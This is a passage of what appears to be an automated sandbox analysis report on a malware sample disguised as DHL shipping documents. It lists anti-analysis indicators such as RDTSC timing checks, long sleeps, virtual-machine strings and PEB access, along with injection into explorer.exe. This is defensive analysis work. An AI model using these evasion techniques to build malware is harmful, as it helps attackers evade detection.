Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 00000000030C9B7E second address: 00000000030C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_3-14021

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe TID: 6944	Thread sleep time: -37529s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe TID: 716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1932	Thread sleep count: 9711 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1932	Thread sleep time: -19422000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1932	Thread sleep count: 201 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1932	Thread sleep time: -402000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2232	Thread sleep count: 153 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2232	Thread sleep time: -306000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2232	Thread sleep count: 9819 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2232	Thread sleep time: -19638000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Code function: 2_2_00409AB0 rdtsc

2_2_00409AB0

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 9711	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 886	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 866	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 9819	Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	API coverage: 1.6 %
Source: C:\Windows\SysWOW64\explorer.exe	API coverage: 1.7 %

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Thread delayed: delay time: 37529			Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000003.00000003.3181064285.0000000000C86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 43 bd 4f fb d6 f7-05 68 d7 e7 4d 4c b1 65
Source: explorer.exe, 00000003.00000003.3181064285.0000000000C86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ware, Inc.NoneVMware-42 27 43 bd 4f fb d6 f7-05 68 d7 e7 4d 4c b1 65VMware7
Source: explorer.exe, 00000003.00000000.998701663.0000000009242000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.994482396.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000z
Source: explorer.exe, 00000003.00000000.998701663.00000000093C3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000003.00000002.3449753491.0000000009242000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000Y
Source: explorer.exe, 00000003.00000000.998701663.00000000093F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3449753491.0000000009360000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3449753491.00000000093F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.998701663.0000000009360000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000003.3181064285.0000000000C86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareCloudData.Scope
Source: explorer.exe, 00000003.00000003.3181064285.0000000000C86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware7
Source: explorer.exe, 00000003.00000000.994482396.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: explorer.exe, 00000003.00000003.2777209012.00000000095C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&11bd2db8&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.3449753491.0000000009242000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&11bd2db8&0&000000*rN(
Source: explorer.exe, 00000003.00000000.995226314.0000000004C2A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&11bd2db8&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g
Source: explorer.exe, 00000003.00000000.1000903527.000000000BA83000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&11BD2DB8&0&000000

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Code function: 2_2_00409AB0 rdtsc

2_2_00409AB0

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0158A15A mov eax, dword ptr fs:[00000030h]	2_2_0158A15A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CA147 mov eax, dword ptr fs:[00000030h]	2_2_014CA147
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CA147 mov eax, dword ptr fs:[00000030h]	2_2_014CA147
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CA147 mov eax, dword ptr fs:[00000030h]	2_2_014CA147
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01510145 mov eax, dword ptr fs:[00000030h]	2_2_01510145
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0158A116 mov eax, dword ptr fs:[00000030h]	2_2_0158A116
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155C130 mov ecx, dword ptr fs:[00000030h]	2_2_0155C130
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D41C0 mov eax, dword ptr fs:[00000030h]	2_2_014D41C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D41C0 mov eax, dword ptr fs:[00000030h]	2_2_014D41C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D41C0 mov eax, dword ptr fs:[00000030h]	2_2_014D41C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A41C0 mov eax, dword ptr fs:[00000030h]	2_2_015A41C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A41C0 mov eax, dword ptr fs:[00000030h]	2_2_015A41C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A41C0 mov eax, dword ptr fs:[00000030h]	2_2_015A41C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A41C0 mov eax, dword ptr fs:[00000030h]	2_2_015A41C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A41C0 mov eax, dword ptr fs:[00000030h]	2_2_015A41C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A41C0 mov eax, dword ptr fs:[00000030h]	2_2_015A41C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A41C0 mov eax, dword ptr fs:[00000030h]	2_2_015A41C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C81EB mov eax, dword ptr fs:[00000030h]	2_2_014C81EB
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015661E0 mov eax, dword ptr fs:[00000030h]	2_2_015661E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015041EF mov eax, dword ptr fs:[00000030h]	2_2_015041EF
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155A180 mov eax, dword ptr fs:[00000030h]	2_2_0155A180
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D61B9 mov eax, dword ptr fs:[00000030h]	2_2_014D61B9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015001A8 mov eax, dword ptr fs:[00000030h]	2_2_015001A8
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D8049 mov eax, dword ptr fs:[00000030h]	2_2_014D8049
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157404C mov eax, dword ptr fs:[00000030h]	2_2_0157404C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C8050 mov eax, dword ptr fs:[00000030h]	2_2_014C8050
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155001C mov eax, dword ptr fs:[00000030h]	2_2_0155001C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155001C mov eax, dword ptr fs:[00000030h]	2_2_0155001C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155001C mov eax, dword ptr fs:[00000030h]	2_2_0155001C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155001C mov ecx, dword ptr fs:[00000030h]	2_2_0155001C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155001C mov eax, dword ptr fs:[00000030h]	2_2_0155001C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155001C mov eax, dword ptr fs:[00000030h]	2_2_0155001C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159A012 mov eax, dword ptr fs:[00000030h]	2_2_0159A012
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A600F mov eax, dword ptr fs:[00000030h]	2_2_015A600F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01552009 mov eax, dword ptr fs:[00000030h]	2_2_01552009
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01578020 mov ecx, dword ptr fs:[00000030h]	2_2_01578020
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015000D4 mov eax, dword ptr fs:[00000030h]	2_2_015000D4
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015560E0 mov eax, dword ptr fs:[00000030h]	2_2_015560E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015560E0 mov eax, dword ptr fs:[00000030h]	2_2_015560E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015560E0 mov eax, dword ptr fs:[00000030h]	2_2_015560E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015560E0 mov eax, dword ptr fs:[00000030h]	2_2_015560E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015560E0 mov eax, dword ptr fs:[00000030h]	2_2_015560E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015560E0 mov eax, dword ptr fs:[00000030h]	2_2_015560E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015560E0 mov eax, dword ptr fs:[00000030h]	2_2_015560E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CC0F6 mov eax, dword ptr fs:[00000030h]	2_2_014CC0F6
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01556080 mov eax, dword ptr fs:[00000030h]	2_2_01556080
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0158C08D mov eax, dword ptr fs:[00000030h]	2_2_0158C08D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CC090 mov eax, dword ptr fs:[00000030h]	2_2_014CC090
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CA093 mov ecx, dword ptr fs:[00000030h]	2_2_014CA093
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015120B0 mov ecx, dword ptr fs:[00000030h]	2_2_015120B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015740A4 mov eax, dword ptr fs:[00000030h]	2_2_015740A4
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015740A4 mov eax, dword ptr fs:[00000030h]	2_2_015740A4
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D60B4 mov eax, dword ptr fs:[00000030h]	2_2_014D60B4
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D60B4 mov eax, dword ptr fs:[00000030h]	2_2_014D60B4
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157E0AB mov eax, dword ptr fs:[00000030h]	2_2_0157E0AB
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157E0AB mov eax, dword ptr fs:[00000030h]	2_2_0157E0AB
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157E0AB mov ecx, dword ptr fs:[00000030h]	2_2_0157E0AB
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157E0AB mov eax, dword ptr fs:[00000030h]	2_2_0157E0AB
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C8347 mov eax, dword ptr fs:[00000030h]	2_2_014C8347
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C8347 mov eax, dword ptr fs:[00000030h]	2_2_014C8347
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C8347 mov eax, dword ptr fs:[00000030h]	2_2_014C8347
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014EE340 mov eax, dword ptr fs:[00000030h]	2_2_014EE340
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014EE340 mov eax, dword ptr fs:[00000030h]	2_2_014EE340
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014EE340 mov eax, dword ptr fs:[00000030h]	2_2_014EE340
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CE328 mov eax, dword ptr fs:[00000030h]	2_2_014CE328
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CE328 mov eax, dword ptr fs:[00000030h]	2_2_014CE328
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CE328 mov eax, dword ptr fs:[00000030h]	2_2_014CE328
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA320 mov eax, dword ptr fs:[00000030h]	2_2_014DA320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA320 mov eax, dword ptr fs:[00000030h]	2_2_014DA320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA320 mov eax, dword ptr fs:[00000030h]	2_2_014DA320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA320 mov eax, dword ptr fs:[00000030h]	2_2_014DA320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA320 mov eax, dword ptr fs:[00000030h]	2_2_014DA320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA320 mov eax, dword ptr fs:[00000030h]	2_2_014DA320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D8320 mov eax, dword ptr fs:[00000030h]	2_2_014D8320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D8320 mov eax, dword ptr fs:[00000030h]	2_2_014D8320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D8320 mov eax, dword ptr fs:[00000030h]	2_2_014D8320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D8320 mov eax, dword ptr fs:[00000030h]	2_2_014D8320
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159832E mov eax, dword ptr fs:[00000030h]	2_2_0159832E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159832E mov eax, dword ptr fs:[00000030h]	2_2_0159832E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0339 mov eax, dword ptr fs:[00000030h]	2_2_014E0339
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0339 mov eax, dword ptr fs:[00000030h]	2_2_014E0339
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0339 mov eax, dword ptr fs:[00000030h]	2_2_014E0339
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0339 mov eax, dword ptr fs:[00000030h]	2_2_014E0339
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0339 mov eax, dword ptr fs:[00000030h]	2_2_014E0339
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0339 mov eax, dword ptr fs:[00000030h]	2_2_014E0339
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0339 mov eax, dword ptr fs:[00000030h]	2_2_014E0339
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0339 mov eax, dword ptr fs:[00000030h]	2_2_014E0339
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CC3C7 mov eax, dword ptr fs:[00000030h]	2_2_014CC3C7
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CE3C0 mov eax, dword ptr fs:[00000030h]	2_2_014CE3C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CE3C0 mov eax, dword ptr fs:[00000030h]	2_2_014CE3C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CE3C0 mov eax, dword ptr fs:[00000030h]	2_2_014CE3C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015083C2 mov eax, dword ptr fs:[00000030h]	2_2_015083C2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015083C2 mov eax, dword ptr fs:[00000030h]	2_2_015083C2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015083C2 mov eax, dword ptr fs:[00000030h]	2_2_015083C2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FA3D0 mov eax, dword ptr fs:[00000030h]	2_2_014FA3D0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FA3D0 mov eax, dword ptr fs:[00000030h]	2_2_014FA3D0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FA3D0 mov eax, dword ptr fs:[00000030h]	2_2_014FA3D0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A3F0 mov eax, dword ptr fs:[00000030h]	2_2_0150A3F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154C3F0 mov eax, dword ptr fs:[00000030h]	2_2_0154C3F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015503B1 mov eax, dword ptr fs:[00000030h]	2_2_015503B1
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015503B1 mov eax, dword ptr fs:[00000030h]	2_2_015503B1
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F23AA mov eax, dword ptr fs:[00000030h]	2_2_014F23AA
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E3B2 mov eax, dword ptr fs:[00000030h]	2_2_0154E3B2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E3B2 mov eax, dword ptr fs:[00000030h]	2_2_0154E3B2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E3B2 mov eax, dword ptr fs:[00000030h]	2_2_0154E3B2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E3B2 mov eax, dword ptr fs:[00000030h]	2_2_0154E3B2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015063AF mov eax, dword ptr fs:[00000030h]	2_2_015063AF
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E244 mov eax, dword ptr fs:[00000030h]	2_2_0150E244
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E244 mov eax, dword ptr fs:[00000030h]	2_2_0150E244
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150424B mov ecx, dword ptr fs:[00000030h]	2_2_0150424B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150424B mov eax, dword ptr fs:[00000030h]	2_2_0150424B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150424B mov eax, dword ptr fs:[00000030h]	2_2_0150424B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F0260 mov ecx, dword ptr fs:[00000030h]	2_2_014F0260
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01550267 mov eax, dword ptr fs:[00000030h]	2_2_01550267
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01550267 mov eax, dword ptr fs:[00000030h]	2_2_01550267
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01550267 mov eax, dword ptr fs:[00000030h]	2_2_01550267
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CA200 mov eax, dword ptr fs:[00000030h]	2_2_014CA200
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0200 mov eax, dword ptr fs:[00000030h]	2_2_014E0200
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0200 mov eax, dword ptr fs:[00000030h]	2_2_014E0200
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C821B mov eax, dword ptr fs:[00000030h]	2_2_014C821B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA223 mov eax, dword ptr fs:[00000030h]	2_2_014DA223
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA223 mov eax, dword ptr fs:[00000030h]	2_2_014DA223
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA223 mov eax, dword ptr fs:[00000030h]	2_2_014DA223
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA223 mov eax, dword ptr fs:[00000030h]	2_2_014DA223
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA223 mov eax, dword ptr fs:[00000030h]	2_2_014DA223
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0231 mov eax, dword ptr fs:[00000030h]	2_2_014E0231
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0231 mov eax, dword ptr fs:[00000030h]	2_2_014E0231
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0231 mov eax, dword ptr fs:[00000030h]	2_2_014E0231
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A2CB mov eax, dword ptr fs:[00000030h]	2_2_0150A2CB
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A2CB mov eax, dword ptr fs:[00000030h]	2_2_0150A2CB
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A2CB mov eax, dword ptr fs:[00000030h]	2_2_0150A2CB
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E2C9 mov eax, dword ptr fs:[00000030h]	2_2_0154E2C9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F42EF mov eax, dword ptr fs:[00000030h]	2_2_014F42EF
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F42EF mov eax, dword ptr fs:[00000030h]	2_2_014F42EF
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CC2B0 mov ecx, dword ptr fs:[00000030h]	2_2_014CC2B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01566550 mov eax, dword ptr fs:[00000030h]	2_2_01566550
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01566550 mov eax, dword ptr fs:[00000030h]	2_2_01566550
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E55C mov eax, dword ptr fs:[00000030h]	2_2_0150E55C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D2540 mov eax, dword ptr fs:[00000030h]	2_2_014D2540
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E255B mov eax, dword ptr fs:[00000030h]	2_2_014E255B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E255B mov eax, dword ptr fs:[00000030h]	2_2_014E255B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E255B mov eax, dword ptr fs:[00000030h]	2_2_014E255B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E255B mov eax, dword ptr fs:[00000030h]	2_2_014E255B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E255B mov eax, dword ptr fs:[00000030h]	2_2_014E255B
